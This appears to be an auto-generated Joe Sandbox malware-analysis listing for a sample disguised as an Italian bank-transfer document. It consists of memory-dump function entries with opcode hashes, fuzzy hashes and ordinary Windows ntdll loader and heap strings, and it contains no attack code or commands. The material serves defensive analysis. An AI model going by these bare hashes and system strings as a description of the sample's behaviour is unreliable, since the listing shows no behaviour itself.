                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                  • API String ID: 0-1373925480
                                  • Opcode ID: d18148a80b7d5ce9a0353561b25e0101b61c9ac544d692602d47d01aac02b30d
                                  • Instruction ID: 35d0219708588b32bea3c68e3fdda6c9c2a8e877761f23db1ce044e0647c9bd9
                                  • Opcode Fuzzy Hash: d18148a80b7d5ce9a0353561b25e0101b61c9ac544d692602d47d01aac02b30d
                                  • Instruction Fuzzy Hash: 56412272A00368CBEB2ADBD9D844BADBBB4FF55380F140059DD61EBB81E7349981CB11
                                  Function 01144755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01144888
                                  • LdrpCheckRedirection, xrefs: 0114488F
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01144899
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-3154609507
                                  • Opcode ID: 9c1bb89218627a14ecf4b2c3f58a78302a02e4d894af67ba637b9faddf3794e5
                                  • Instruction ID: 906cdcc8ceb0423c0ada20adad46296675d75bd555b8591246a1126a6d581c54
                                  • Opcode Fuzzy Hash: 9c1bb89218627a14ecf4b2c3f58a78302a02e4d894af67ba637b9faddf3794e5
                                  • Instruction Fuzzy Hash: 1B41E432A00A529FDB29CF9CD840B267BE4FF49E50B06016DED94E7B11E330D801CB81
                                  Function 010D0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-2558761708
                                  • Opcode ID: 99dde28e25641c4c9a9f4b94c1484bd18d87f921658a3c4ccf5ecceff2d97aef
                                  • Instruction ID: f2a188000a975d7cecd3b10598becfc40d837888d209e644e7fb6054aa282c20
                                  • Opcode Fuzzy Hash: 99dde28e25641c4c9a9f4b94c1484bd18d87f921658a3c4ccf5ecceff2d97aef
                                  • Instruction Fuzzy Hash: 1411E4313182929FDB5DCA19C8D4BFAF7A6EF40625F148169F48ACB255EB30DC50C751
                                  Function 011420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01142104
                                  • Process initialization failed with status 0x%08lx, xrefs: 011420F3
                                  • LdrpInitializationFailure, xrefs: 011420FA
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2986994758
                                  • Opcode ID: b91b8e2ecece4a3b319056b8ef60f42c3a1035cca05f3def29ae3d2a063164c9
                                  • Instruction ID: aff298b926b8901b777fa06d10d4e9ffc77193c614667b978d94842d4f13b509
                                  • Opcode Fuzzy Hash: b91b8e2ecece4a3b319056b8ef60f42c3a1035cca05f3def29ae3d2a063164c9
                                  • Instruction Fuzzy Hash: 8FF0C235641308ABE728E64DDC92FA93768EB44F58F940069FB507B685D3F0A980CA91
                                  Function 010D03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: #%u
                                  • API String ID: 48624451-232158463
                                  • Opcode ID: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                  • Instruction ID: 187f1672accb05ab60cc39eb06688544a88ffb3cd327f8a27294e0305de4bef4
                                  • Opcode Fuzzy Hash: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                  • Instruction Fuzzy Hash: B07169B1A0020A9FDB05DFA8C980FAEB7F8FF18704F144065E905AB251EB74ED51CBA1
                                  Function 010CA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrResSearchResource Enter, xrefs: 010CAA13
                                  • LdrResSearchResource Exit, xrefs: 010CAA25
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                  • API String ID: 0-4066393604
                                  • Opcode ID: bdceb5af3e2a45aeeabec17e2287d30ea90e3d82d63080144314080538215f49
                                  • Instruction ID: 70d94841659b730bec1a30ed286aac50e4a58d25ed51cb2d01582d3113247a83
                                  • Opcode Fuzzy Hash: bdceb5af3e2a45aeeabec17e2287d30ea90e3d82d63080144314080538215f49
                                  • Instruction Fuzzy Hash: 7AE18F71F00219DBEB268F9CC980BEEBBB9BF08B14F10446AE951E7251E7389950CF51
                                  Function 0118A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction ID: 47fd6e9ece10615d61f618517d0302b816589588daa414ac2d7d8196c822d06d
                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction Fuzzy Hash: A4C1F4312043429BEB28EF28D841B6BBBE5AFC4318F188A2EF695C7290D775D545CF51
                                  Function 0113E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: 24527b543a3d199565b955d7cce3d0273b3ae3d3900ff86740f41b36d12ae267
                                  • Instruction ID: 45f5a658a4b1e8fc0ac98f4bcbbb0dbfd6995dd3265eeacf7bfe3a1195a7ff9f
                                  • Opcode Fuzzy Hash: 24527b543a3d199565b955d7cce3d0273b3ae3d3900ff86740f41b36d12ae267
                                  • Instruction Fuzzy Hash: FE615E71E017199FDB19DFA8C850BAEBBB5FF88704F14406DE649EB295D731A900CB50
                                  Function 011643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$MUI
                                  • API String ID: 0-17815947
                                  • Opcode ID: 8049a94938566489a9043f20429efe17319f969f3405cc3bd9a89b255b143c1d
                                  • Instruction ID: 6b79e5a6b4c977f6c8b859f2e3e4ddc8a1a16a244ba6d8f9742465b3e75f9e67
                                  • Opcode Fuzzy Hash: 8049a94938566489a9043f20429efe17319f969f3405cc3bd9a89b255b143c1d
                                  • Instruction Fuzzy Hash: C05137B1E0021DAEDF15DFA9CC84AEEBBBCEB48754F100529E611B7690D7719E05CBA0
                                  Function 010C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010C063D
                                  • kLsE, xrefs: 010C0540
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                  • API String ID: 0-2547482624
                                  • Opcode ID: 0cfb27042c59f45eb6161e821435f3abae50b1d5905510187fa04fae2c5a631e
                                  • Instruction ID: 18b6a7f5d3ae61f8aa56bb79816020e459a7ab4307c6efcda3bb601658ac7759
                                  • Opcode Fuzzy Hash: 0cfb27042c59f45eb6161e821435f3abae50b1d5905510187fa04fae2c5a631e
                                  • Instruction Fuzzy Hash: 0D51CE79600742CFD724DF78C5806ABBBE4AF88B04F10893EE6EA87245E7709545CF92
                                  Function 010CA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 010CA2FB
                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 010CA309
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                  • API String ID: 0-2876891731
                                  • Opcode ID: 03e473c644b81d89140c60df415e5dce4701892754d233877038c5610dc39e83
                                  • Instruction ID: ac2f5d4592d7f96ba14d1f86da039c069ef42265f3cf17d90708a887ed2af744
                                  • Opcode Fuzzy Hash: 03e473c644b81d89140c60df415e5dce4701892754d233877038c5610dc39e83
                                  • Instruction Fuzzy Hash: 9141BE71B04659DBDB29CF69C850BAE7BB4FF84B00F1480A9E980DB291E3B5D900CF51
                                  Function 010FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Cleanup Group$Threadpool!
                                  • API String ID: 2994545307-4008356553
                                  • Opcode ID: b767c943526d3bbe4fda6c7939b50ca92abb95601b308a395e2b4eedba40886d
                                  • Instruction ID: 773ea0b06412ec3e20d90356f18b5c44c621dd90354b3fb671b508c44c95cd9d
                                  • Opcode Fuzzy Hash: b767c943526d3bbe4fda6c7939b50ca92abb95601b308a395e2b4eedba40886d
                                  • Instruction Fuzzy Hash: 5D01ADB2650700EFE312DF24CD46B1677E8E798715F00893DA69CCB590E374D804CB46
                                  Function 010CC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: MUI
                                  • API String ID: 0-1339004836
                                  • Opcode ID: b2e483a8f83efbfff21a73a479f8c041067c84c608d68dc643da69b3056f4b9a
                                  • Instruction ID: 21573ce60807c725f4a3380a88c5e53885531c6403465079367aa33d3c582e30
                                  • Opcode Fuzzy Hash: b2e483a8f83efbfff21a73a479f8c041067c84c608d68dc643da69b3056f4b9a
                                  • Instruction Fuzzy Hash: 8B825D75E002198FEB65CFA9C980BEDBBB1BF48B10F1481ADE999AB251D7309D41CF50
                                  Function 01146420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 9e2024d8aacb2516b609d9f30b767efb1500d2168b5cf7be34dfbc05858f0123
                                  • Instruction ID: d668f6eb27cb9769617bfcfde7eb06ca33bb8f1f4b267a98baac92d5adcbb3d5
                                  • Opcode Fuzzy Hash: 9e2024d8aacb2516b609d9f30b767efb1500d2168b5cf7be34dfbc05858f0123
                                  • Instruction Fuzzy Hash: 929184B1A40219AFEB25DF95CD85FEEBBB8EF59B54F104065F600AB190D774AD00CBA0
                                  Function 010FA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: GlobalTags
                                  • API String ID: 0-1106856819
                                  • Opcode ID: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                  • Instruction ID: 068b7e40d782b0a0ce528654d2d9a4e41f57be906b070bdb23065eb56af48c9b
                                  • Opcode Fuzzy Hash: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                  • Instruction Fuzzy Hash: 8B716BB5E0060AEFDF2DCF98C5906EDBBB1BF88714F14816EE945A7248E7718A41CB50
                                  Function 01164978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .mui
                                  • API String ID: 0-1199573805
                                  • Opcode ID: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                  • Instruction ID: 530743610de6527435fff42546c47304aeaafebd81fb3ce5deb9c7cfd51f2ef1
                                  • Opcode Fuzzy Hash: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                  • Instruction Fuzzy Hash: DF51B872D0022A9BDF19DF99D840AEEBBB8EF04A54F054129E951BB640D3359C11CBE4
                                  Function 010DE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: EXT-
                                  • API String ID: 0-1948896318
                                  • Opcode ID: 4df55c697b60c08a4b933de838a21d38e7f733f1f32750287aa4c5a3d131c76b
                                  • Instruction ID: 0e034d2609850371c04ccc16610476c6982592adc1eee09f968fc0c59a4f6d7a
                                  • Opcode Fuzzy Hash: 4df55c697b60c08a4b933de838a21d38e7f733f1f32750287aa4c5a3d131c76b
                                  • Instruction Fuzzy Hash: AA419E72608312ABD751DA75C884BAFBBE8BF88B14F45096DFAC4DB180E774D904C792
                                  Function 010BCDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AlternateCodePage
                                  • API String ID: 0-3889302423
                                  • Opcode ID: f0ce0bd84f33ae8c6a34b0c700cdb040c3d011cbd3e672af2a6164731f253f05
                                  • Instruction ID: b882abdd69a6375e2f7a97e3dcdb4137282613ad1e18789ced7201ad5ccf81a7
                                  • Opcode Fuzzy Hash: f0ce0bd84f33ae8c6a34b0c700cdb040c3d011cbd3e672af2a6164731f253f05
                                  • Instruction Fuzzy Hash: 5A41D172D01249EAEF29DB98DC80AEEFBF8FF84310F14416AE511E7254D7709A41CB51
                                  Function 0113C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  • Opcode ID: 298df512071ee6d11aac9919ed80468770d820e468e8cbbdf0e0706fa9d29ef9
                                  • Instruction ID: 976d51aa8205205cb597d28f88f1212561457f00fbfb9268ad755d3807166233
                                  • Opcode Fuzzy Hash: 298df512071ee6d11aac9919ed80468770d820e468e8cbbdf0e0706fa9d29ef9
                                  • Instruction Fuzzy Hash: 574121B1D0062DAADB25DA50CC84FDEB77CAB54718F0045E6EB08BB144DB709E898FE4
                                  Function 01156B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #
                                  • API String ID: 0-1885708031
                                  • Opcode ID: 8c9f18217b2d205887f64894f650f1a96cc96b5dcb1dab34166178f1be968108
                                  • Instruction ID: 9700e758265586b6475a00e9d0ad1352cf2e1033a5e808ccb8f0d72b21f10a0e
                                  • Opcode Fuzzy Hash: 8c9f18217b2d205887f64894f650f1a96cc96b5dcb1dab34166178f1be968108
                                  • Instruction Fuzzy Hash: 6E312A31F00709DBEB2ADB69C850BEE7BB8DF55704F944028ED60AB282C775D905CB90
                                  Function 0113CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryName
                                  • API String ID: 0-215506332
                                  • Opcode ID: a0db59dabb3c128ffcfa833ffcf65edbb6116ee84aff16d32ffc865b133bc6b7
                                  • Instruction ID: 74afc80bf5c2dc6c1ac73ded271ccf62d3f58110f6f5d43137b42a7db675c27f
                                  • Opcode Fuzzy Hash: a0db59dabb3c128ffcfa833ffcf65edbb6116ee84aff16d32ffc865b133bc6b7
                                  • Instruction Fuzzy Hash: 0B31E576900519AFEB1EDB59C855FAFBB74EBC0790F01412AE905B7254D7309E04DBE0
                                  Function 0114892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  Strings
                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0114895E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                  • API String ID: 0-702105204
                                  • Opcode ID: 3ea2d8b7ac6cc39c53a73ff329272cc75ea8279ee6ab7a8e5b029f2696212d20
                                  • Instruction ID: 43ff17aa30f112ab497cf6f89aa2b4e9d0a9bf64f22701490adc86b68a8ef438
                                  • Opcode Fuzzy Hash: 3ea2d8b7ac6cc39c53a73ff329272cc75ea8279ee6ab7a8e5b029f2696212d20
                                  • Instruction Fuzzy Hash: 7F012B39211A06DFEA2D6F95DCC4B9A7F66EFC5E94B08002CF78116151DB206C81C793
                                  Function 01162000 Relevance: .8, Instructions: 757COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 725b93ecd11761517a961774b891bd3d72401adbb363a394bf98ec52ed76a1e0
                                  • Instruction ID: 8577386e80d39f9c20ac103bde51bb56b125614b9f567ae5bfdb2c227e7857ed
                                  • Opcode Fuzzy Hash: 725b93ecd11761517a961774b891bd3d72401adbb363a394bf98ec52ed76a1e0
                                  • Instruction Fuzzy Hash: E042D3726083418FD72DCF68C890A6BBBEDBF98344F08492DFA8297250D776D855CB52
                                  Function 01158158 Relevance: .6, Instructions: 617COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4f1a4a56f165cfc9b1d707a51a719ac17881936ad01d36c9dbbb474495abbbf8
                                  • Instruction ID: d2d816ac356c10d0cbd6d0e3628a7f49c0efa97e93ad366dfe22f6b2cb58af1f
                                  • Opcode Fuzzy Hash: 4f1a4a56f165cfc9b1d707a51a719ac17881936ad01d36c9dbbb474495abbbf8
                                  • Instruction Fuzzy Hash: 28425F75E10219CFEB69CF6AC841BADBBF5BF48300F148099E999EB242D7349981CF50
                                  Function 010D2840 Relevance: .6, Instructions: 605COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6068299cb5205f77585d15fbf126d941bba26cf40bc932668fdd4f0ee1a319ed
                                  • Instruction ID: 455f228e57c7c9f7d7138e442dfc08df34fa312ed0441b2609d4a40131e8e25c
                                  • Opcode Fuzzy Hash: 6068299cb5205f77585d15fbf126d941bba26cf40bc932668fdd4f0ee1a319ed
                                  • Instruction Fuzzy Hash: DA32DE70A007658FEB2DCF69C8447BEBBF2BF84304F24411DD9969B285DB75A862CB50
                                  Function 0116A118 Relevance: .6, Instructions: 591COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d55a033c934b1b4fa4c37cf3c2cbd6a09c5ea55ca53795d0f3c3a2d632406f6f
                                  • Instruction ID: e43e73ef3c5ac9072131184fbfed59b86dd4aee8e763913c270d8bf738f93453
                                  • Opcode Fuzzy Hash: d55a033c934b1b4fa4c37cf3c2cbd6a09c5ea55ca53795d0f3c3a2d632406f6f
                                  • Instruction Fuzzy Hash: B222D4702046618FE72DCF2DE490372BBF9AF45304F098459D9969F286D737E862CB61
                                  Function 010E8DBF Relevance: .6, Instructions: 554COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: db2775f6b68cd44549432960a10acfd32407b3a8a5b41b6f877a6b469316f1aa
                                  • Instruction ID: ae0d8c9b8670f61856a08450b13d601b490642bd0c72f339c43be4dfa136feb0
                                  • Opcode Fuzzy Hash: db2775f6b68cd44549432960a10acfd32407b3a8a5b41b6f877a6b469316f1aa
                                  • Instruction Fuzzy Hash: D3225C70E0422A9FCF19CF9AD4849FEFBF2AF44304B15805AE9859B241E734DD51CBA0
                                  Function 010C6A50 Relevance: .5, Instructions: 548COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f26801c4327ff9fb2e2a54a825e2f40c5c1385d6598495e2235204c08fdaa580
                                  • Instruction ID: bbb48cb9698bb9d3b53bd70429b14b830745d5b5c8312fa43f0adda341880b1f
                                  • Opcode Fuzzy Hash: f26801c4327ff9fb2e2a54a825e2f40c5c1385d6598495e2235204c08fdaa580
                                  • Instruction Fuzzy Hash: 6A329C70A04215DFDB29CF68C480AAEBBF2FF48710F24456EE995AB391D731A851CF90
                                  Function 010E4A35 Relevance: .4, Instructions: 423COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                  • Instruction ID: 4ad29277baf7fad50c0ef3383d6727afdd93d276d1d78c6d643163e84744938e
                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                  • Instruction Fuzzy Hash: 64F19F71E0421A9FDF19DF9AC884BAEBBF5AF48710F048169E985EB340E775D841CB60
                                  Function 0115892B Relevance: .4, Instructions: 386COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
